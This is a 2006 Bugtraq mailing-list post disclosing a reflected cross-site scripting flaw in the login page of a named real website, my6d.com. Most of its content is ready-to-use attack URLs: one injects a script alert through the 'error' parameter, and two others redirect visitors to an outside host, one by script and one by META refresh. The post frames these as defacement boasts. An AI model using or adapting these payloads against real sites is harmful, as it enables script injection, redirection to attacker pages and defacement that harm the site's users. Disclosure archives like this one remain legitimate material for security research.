Bugtraq mailing list archives
XSS Vulnerability on www.my6d.com Connection Work System
From: spymeta () yahoo com
Date: 25 May 2006 17:44:35 -0000
XSS (Cross Site Scripting) on My6D Connection Work System. We Can Run JScript & HTML Codes & META Tags etc... Example : http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=<script>alert('SPYMETA%20WAS%20HERE%20!')</script> We Can Direct The Page Our Hacked Index.... Example : http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=<script>window.location.href="http://members.lycos.co.uk/spymeta/hacked..jpg";</script> Or We Can Run Direct Meta Tag.. Example : http://www.my6d.com/Plugins/SixDegreeMain/MainLogin.aspx?error=<META http-equiv="refresh" content="0; url=http://members.lycos.co.uk/spymeta/hacked..jpg";> Powered / Credit : SPYMETA
![http://members.lycos.co.uk/spymeta/hacked..jpg"](http://members.lycos.co.uk/spymeta/hacked..jpg"){kind=link}
Current thread:
- XSS Vulnerability on www.my6d.com Connection Work System spymeta (May 26)